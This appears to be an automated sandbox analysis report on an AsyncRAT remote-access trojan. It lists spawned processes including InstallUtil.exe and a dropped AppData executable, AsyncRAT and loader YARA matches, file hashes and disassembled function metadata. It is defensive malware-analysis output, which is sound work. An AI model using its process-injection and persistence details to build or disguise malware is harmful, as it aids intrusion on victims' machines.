Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs Detection: 63%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:27:10
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x7a0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1852689671.0000000005126000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1845196723.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:27:15
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Ouopxupnarf.exe"
Imagebase:	0x8d0000
File size:	2'266'112 bytes
MD5 hash:	A6894B09A24E7F7AAE0B17614279BE90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.1879701013.0000000003FEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:27:16
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x8b0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.1909891753.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.1911540442.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	50%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	53
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004014EB
SetUnhandledExceptionFilter.KERNEL32(004014AF), ref: 004014F9
__set_app_type.MSVCRT ref: 00401504
_controlfp.MSVCRT ref: 00401518
__getmainargs.MSVCRT ref: 00401546
exit.MSVCRT ref: 00401578

Memory Dump Source

Source File: 00000000.00000002.1631318227.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1631305124.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631331884.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631482129.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KMj8h32vWy.jbxd

Similarity

API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 3649950142-0
Opcode ID: be3743a1a68ccbb8de6a21c7a699b629a82aa3f86af1967a592f5b91c5aed7ad
Instruction ID: 9eb8f9e503e867bc409eae7e2564ada24cdb9d94c0ba499649a0b24450958633
Opcode Fuzzy Hash: be3743a1a68ccbb8de6a21c7a699b629a82aa3f86af1967a592f5b91c5aed7ad
Instruction Fuzzy Hash: 8B115EF5E00104ABDB04EBA8DD85F4A73ADAB18304F080476F905E33A1E67EE9148FB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040108C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 239
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(759E6044,759E6044,759E6044,00000000), ref: 004010F3
memset.MSVCRT ref: 00401108
memset.MSVCRT ref: 00401150
strcmp.MSVCRT ref: 004011E2
strcpy.MSVCRT(?,00000000), ref: 00401230
getenv.MSVCRT ref: 0040126D
sprintf.MSVCRT ref: 004012BF
fopen.MSVCRT ref: 004012D4
fwrite.MSVCRT ref: 00401339
fclose.MSVCRT ref: 00401348
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 004013A0

Strings

1 @, xrefs: 004010C7
m!@, xrefs: 00401118
& @, xrefs: 004010B0
! @, xrefs: 0040109C
%s\%s, xrefs: 004012B2, 004012B7
|!@, xrefs: 00401120
`!@, xrefs: 00401110

Memory Dump Source

Source File: 00000000.00000002.1631318227.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1631305124.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631331884.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631482129.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KMj8h32vWy.jbxd

Similarity

API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: ! @$%s\%s$& @$1 @$`!@$m!@$|!@
API String ID: 3236948872-2645235846
Opcode ID: 26350fbbe4ff0886eee8f335877b999f1bc63b2783ba7829722f9073dc1efcf5
Instruction ID: 315a5ad334b73eeb66b0ec4f41caecba744680ba938b7b774a97fa92f5f40b99
Opcode Fuzzy Hash: 26350fbbe4ff0886eee8f335877b999f1bc63b2783ba7829722f9073dc1efcf5
Instruction Fuzzy Hash: FF8110F1E001149BDB14DBACDC45B9E77A9EB48309F04057EF509FB392E63DAA448B68

Uniqueness

Uniqueness Score: -1.00%

Function 004011B7 Relevance: 9.1, APIs: 6, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 004011E2
strcpy.MSVCRT(?,00000000), ref: 00401230
getenv.MSVCRT ref: 0040126D
sprintf.MSVCRT ref: 004012BF
fopen.MSVCRT ref: 004012D4
fwrite.MSVCRT ref: 00401339
fclose.MSVCRT ref: 00401348

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 004013A0

Memory Dump Source

Source File: 00000000.00000002.1631318227.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1631305124.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631331884.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631482129.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KMj8h32vWy.jbxd

Similarity

API ID: ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 98952953-0
Opcode ID: a3a69f08edd90b3f4b8ddfad11922c2df6fe81ffd93cb0fcab4b0b785f1db5f5
Instruction ID: 5b4d46dadd9c335ad064e7779f23e028bcb4412ccc34d988ef72e99c46ff17d3
Opcode Fuzzy Hash: a3a69f08edd90b3f4b8ddfad11922c2df6fe81ffd93cb0fcab4b0b785f1db5f5
Instruction Fuzzy Hash: 684137F1E004149BDB18DB58DC91B9973A9EB84309F0405BDF106FB392E53CA989CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

>-s6=5.6kzk4=4<4l/-^7r,m8.h_$u1e, xrefs: 0040106E

Memory Dump Source

Source File: 00000000.00000002.1631318227.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1631305124.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631331884.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631482129.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KMj8h32vWy.jbxd

Similarity

API ID: malloc
String ID: >-s6=5.6kzk4=4<4l/-^7r,m8.h_$u1e
API String ID: 2803490479-2506723462
Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

Uniqueness

Uniqueness Score: -1.00%

Function 0040145B Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1631318227.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1631305124.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631331884.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1631482129.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KMj8h32vWy.jbxd

Similarity

API ID: memset$ExecuteShellstrcmp
String ID:
API String ID: 1389483452-0
Opcode ID: 6528eaf13becb84c01243959e5322eb4e146b36cb4357dc94db8048826d6f215
Instruction ID: e6a9cd1ea5de600f567fef99f65d5e6bf8e90f884107dec43d08bb37069f2361
Opcode Fuzzy Hash: 6528eaf13becb84c01243959e5322eb4e146b36cb4357dc94db8048826d6f215
Instruction Fuzzy Hash: E4F0FE74A00208EFCB40DFA8D981D8A77F8AB48304F044465F908D7350D635E9548FA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7328, Parent PID: 7280COMMON

Executed Functions

Function 043FB570 Relevance: 2.8, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

+Yln^, xrefs: 043FB5AC
Xln^, xrefs: 043FB6B3

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: +Yln^$Xln^
API String ID: 0-71002287
Opcode ID: cafb284b39da97b3796da03c834793d4088679570d2f648f6d93a84f8750e738
Instruction ID: 40695c5f27e2cd6dc3ac051cc86baceb0f7ff246a9c816eb533d79ae7adf9769
Opcode Fuzzy Hash: cafb284b39da97b3796da03c834793d4088679570d2f648f6d93a84f8750e738
Instruction Fuzzy Hash: 869123B1F006155BDB1AEFB4C8156AEB7E3EF84704B04892DD11AAB344DF74AD068BC6

Uniqueness

Uniqueness Score: -1.00%

Function 072C24D8 Relevance: 11.7, Strings: 9, Instructions: 477COMMON

Download Yara Rule

Strings

JYl, xrefs: 072C25EA
4'^q, xrefs: 072C260D
rXl, xrefs: 072C254F
JYl, xrefs: 072C259E
rXl, xrefs: 072C2559
|,"k, xrefs: 072C25DB
pi k, xrefs: 072C2582
JYl, xrefs: 072C25F6
4'^q, xrefs: 072C2619

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$pi k$|,"k$JYl$JYl$JYl$rXl$rXl
API String ID: 0-1183312525
Opcode ID: 2e61039d72c022b4c6c3080105d5a097fde11c39b8bc82f3715e6135190d8dc4
Instruction ID: 4f685fb6b4b086be377234951c428fcfa207e266d525350750c06b08137af83f
Opcode Fuzzy Hash: 2e61039d72c022b4c6c3080105d5a097fde11c39b8bc82f3715e6135190d8dc4
Instruction Fuzzy Hash: B7F147B1B20206CFCB14DB688851A6ABBE6FF95310F1482AEE905CB251DF31DD45CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 072C3D9D Relevance: 5.5, Strings: 4, Instructions: 522COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072C4026
4'^q, xrefs: 072C4030
4'^q, xrefs: 072C418A
4'^q, xrefs: 072C4180

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 287a8a95a2559c97b6d732f569a94b242b48c802b82ae6a9203bce898a35f8dd
Instruction ID: d1204308ce538e861d502052c433b31814f2c61f8bee7a820db7fb2088b57821
Opcode Fuzzy Hash: 287a8a95a2559c97b6d732f569a94b242b48c802b82ae6a9203bce898a35f8dd
Instruction Fuzzy Hash: 7CF17BB17202928FCB15D77898217ABBFE69FE1210F1489AED445CB357DB31C845C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 043FE701 Relevance: 2.6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

Strings

JYl, xrefs: 043FE7BA
pi k, xrefs: 043FE737

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: pi k$JYl
API String ID: 0-1144556745
Opcode ID: 08aa536a533fcd28039d5816cf7ee06d7f9e5caf3de534eb609ae13990e8a544
Instruction ID: 695ad2819fa208f00a0ff2fc16ec0868543c178d3de86046f85936943e10a627
Opcode Fuzzy Hash: 08aa536a533fcd28039d5816cf7ee06d7f9e5caf3de534eb609ae13990e8a544
Instruction Fuzzy Hash: B931DE31A012058FCB14EF69E988ADEBBF2FF48304F108569D406A73A5DB34AC45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 043FE710 Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

JYl, xrefs: 043FE7BA
pi k, xrefs: 043FE737

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: pi k$JYl
API String ID: 0-1144556745
Opcode ID: 2415d40bebfa72d8d0a55e6a9730d6cece61d1ae65dd2e2bf0e8d0069d2a965d
Instruction ID: e1ff62f5ab363b19a7eada72623fdc08042e07a037f820bb6f9fbb394d8ad062
Opcode Fuzzy Hash: 2415d40bebfa72d8d0a55e6a9730d6cece61d1ae65dd2e2bf0e8d0069d2a965d
Instruction Fuzzy Hash: 94316C34A01605DFCB14DF69E998A9EBBF2FF48304F108569D416AB3A4DB34AC45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 043F70A8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(bq, xrefs: 043F71CD

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 8ae715994a5490e99e2c36e8a1bce2fcf57193f37fe9ae87b6ef7e44c7de4121
Instruction ID: 5cc8798493aab197f9b62df8713b6a4495349fe923c886d7160bfd22fa0833c6
Opcode Fuzzy Hash: 8ae715994a5490e99e2c36e8a1bce2fcf57193f37fe9ae87b6ef7e44c7de4121
Instruction Fuzzy Hash: 62415E34B042448FDB14DF68C958AADBBF2EF8D315F1454A9E906AB391DB35EC01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 043FAE08 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

[ln^, xrefs: 043FAF0F, 043FAF14

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: [ln^
API String ID: 0-587385206
Opcode ID: 8b0b6103ffce3ee3325890b45cc79cc3f1c37a9edfc82e613eb40729365c0fc4
Instruction ID: e352b327474f74b0fac3b34fa8adfe1506d0de7ec0d551c790bd1344c7831839
Opcode Fuzzy Hash: 8b0b6103ffce3ee3325890b45cc79cc3f1c37a9edfc82e613eb40729365c0fc4
Instruction Fuzzy Hash: D53190B4A002059FDB04EBA4D855BFE7BF3EF85300F1584BAD514AB394DA399D418FA1

Uniqueness

Uniqueness Score: -1.00%

Function 043FB078 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

(&^q, xrefs: 043FB09A

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: (&^q
API String ID: 0-2067289071
Opcode ID: 0c7aff0ace3e8bc91d15d9aa16e8206deb0646012e0cd0ac5ef1d92dad2e7aae
Instruction ID: b40e94ceaf2b366ea63b8898493d46f1385dcc7ecaa291e6be17d6abdb13b1fd
Opcode Fuzzy Hash: 0c7aff0ace3e8bc91d15d9aa16e8206deb0646012e0cd0ac5ef1d92dad2e7aae
Instruction Fuzzy Hash: 6C21AC72A042588FCB14DFAEE80479EBBF5EB89360F14846AD518A7340CA35A9458FE5

Uniqueness

Uniqueness Score: -1.00%

Function 043FAE18 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

[ln^, xrefs: 043FAF0F, 043FAF14

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: [ln^
API String ID: 0-587385206
Opcode ID: 6b035b0e9a97b7bd009ec9a8dc40d744c69e76323084459e0070f3881759fbf7
Instruction ID: 66b916d37cd5d3b5a15b215daa63958640b017456c87c635395bdb1359865994
Opcode Fuzzy Hash: 6b035b0e9a97b7bd009ec9a8dc40d744c69e76323084459e0070f3881759fbf7
Instruction Fuzzy Hash: DE3169B4E002099FDB04EBA4D855BAEB7F3EF84300F1584B9D615AB394DA39AD418F91

Uniqueness

Uniqueness Score: -1.00%

Function 043FDD68 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

K.ln^, xrefs: 043FDD9E

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: K.ln^
API String ID: 0-370503309
Opcode ID: 1fa40b44112e7dced400070d276036081dc4519eac72b2041cf075aaf844e47b
Instruction ID: 7d99726ac30df81616e0a9fe864f645c446e7fcb64bb98e22841607ba60ebfd7
Opcode Fuzzy Hash: 1fa40b44112e7dced400070d276036081dc4519eac72b2041cf075aaf844e47b
Instruction Fuzzy Hash: 73F059323096205B8611525E7C098EF7B9ACEC62B13440067E20BC7501DE15AD4883F2

Uniqueness

Uniqueness Score: -1.00%

Function 043FDD78 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

K.ln^, xrefs: 043FDD9E

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: K.ln^
API String ID: 0-370503309
Opcode ID: ec41df1da2b3b7f5da07ae20228ef89cccf5ef8a5850c8fab81bd6c24b1afe6a
Instruction ID: a484a6ad8bbb92d1f23a44681260d05077dade99c0c785cf604690990f3eca36
Opcode Fuzzy Hash: ec41df1da2b3b7f5da07ae20228ef89cccf5ef8a5850c8fab81bd6c24b1afe6a
Instruction Fuzzy Hash: 87E0C232741A141B86116A2EA91485FB7DBDFC5671344447EE12AC7340DE64EC0587D5

Uniqueness

Uniqueness Score: -1.00%

Function 043FE888 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b7e7dfff0386ad9e49159dea10182576e0a9bcd20046cc0341a521f5fa86f2
Instruction ID: 0e6e180697505fabfa9b9e35b4fea6792f51c5975663affb31bf507fc1568d3b
Opcode Fuzzy Hash: 20b7e7dfff0386ad9e49159dea10182576e0a9bcd20046cc0341a521f5fa86f2
Instruction Fuzzy Hash: 6891B034B102148FCB14DF79D99596EBBF6AF88710B14506AE902EB364EF35EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043F29F0 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10fbf124a37d59b62c017663b821db387b208f462a372f740ebbdc46d3b0b43f
Instruction ID: 1b339b6a034dad47dac1dae66a2298e19756ccc1100327b86730d35cf39b35d3
Opcode Fuzzy Hash: 10fbf124a37d59b62c017663b821db387b208f462a372f740ebbdc46d3b0b43f
Instruction Fuzzy Hash: 35917A74A00249CFCB15CF58C8989AAFBB1FF48310B248699D915AB369C736FC51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 043FBB90 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a45fcf63c2552577802f27e7bed89d2df240141a95e84601dd37bc3f62448f
Instruction ID: 60ed38d68dede14b0c39dcc169a1c4d6712b07c4812acfcfbeec9bf2fdb99615
Opcode Fuzzy Hash: f7a45fcf63c2552577802f27e7bed89d2df240141a95e84601dd37bc3f62448f
Instruction Fuzzy Hash: 32613AB0E01248DFCB14CFA9D98469DFBF5EF88310F188169E918AB364EB34AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 043FBBA0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df5bb7e4701dd6adfd37737ef7d9cc990f2b9be802ac28c705b5973de397b69
Instruction ID: d01adf042b29e5badd8e43584fee02ac142ea957cf44df566eebf64652786388
Opcode Fuzzy Hash: 9df5bb7e4701dd6adfd37737ef7d9cc990f2b9be802ac28c705b5973de397b69
Instruction Fuzzy Hash: 176118B1E01248DFCB14DFA9D98468DFBF5EF88310F148169E919AB364EB74AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 043F7808 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c7782405f07b8154ccff5c6abcb9d22a6b41cbcd8c4f8aad0e393571f2a573
Instruction ID: a3070c2bc26cd3e36c28fe90141d96cb0cf9fce6ce32fae65cc9a42525a2c3f3
Opcode Fuzzy Hash: 51c7782405f07b8154ccff5c6abcb9d22a6b41cbcd8c4f8aad0e393571f2a573
Instruction Fuzzy Hash: 5551B0303002159FD7049B69D894A6B7BEAFFC8314F1594B9E609CB356EB35EC02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 043FE471 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f390bb2f11cd9e5045e77163a22b52b784c8f163f516d0987942920f874e2492
Instruction ID: 69927ac6838d480d809110e4c740965bd782d5ba972a38dd9af9ac831e2d8528
Opcode Fuzzy Hash: f390bb2f11cd9e5045e77163a22b52b784c8f163f516d0987942920f874e2492
Instruction Fuzzy Hash: 5C5180747102058FDB10DF6CC99596ABBE6EF88314B1594A9E549CF369EB34EC01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 043FE480 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6c4e043e55a77e7fa9945bb725a331d15a6ddade51652f67dc6f6fc910be75
Instruction ID: baff62bcb02de159ebe629c348a35ab6249660bcec68e0cf7e1ccf8886790584
Opcode Fuzzy Hash: 9a6c4e043e55a77e7fa9945bb725a331d15a6ddade51652f67dc6f6fc910be75
Instruction Fuzzy Hash: C6413D747102058FDB10DFADCA9592ABBEAEF88314B159469F549DF329EB34EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043F2B00 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d7e20a9f72e2574b3f33e4fe3c83d77143695c9b9a07ec3ab2b5a42eafa602e
Instruction ID: c152ca4a464715217c32fe1c291303538ee096d9aee753c52941a3318c6271d3
Opcode Fuzzy Hash: 6d7e20a9f72e2574b3f33e4fe3c83d77143695c9b9a07ec3ab2b5a42eafa602e
Instruction Fuzzy Hash: E44139B4A10605DFCB05CF58C5989AAFBB1FF48310B218699D915AB368C736FC51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 043FC468 Relevance: .1, Instructions: 101COMMON

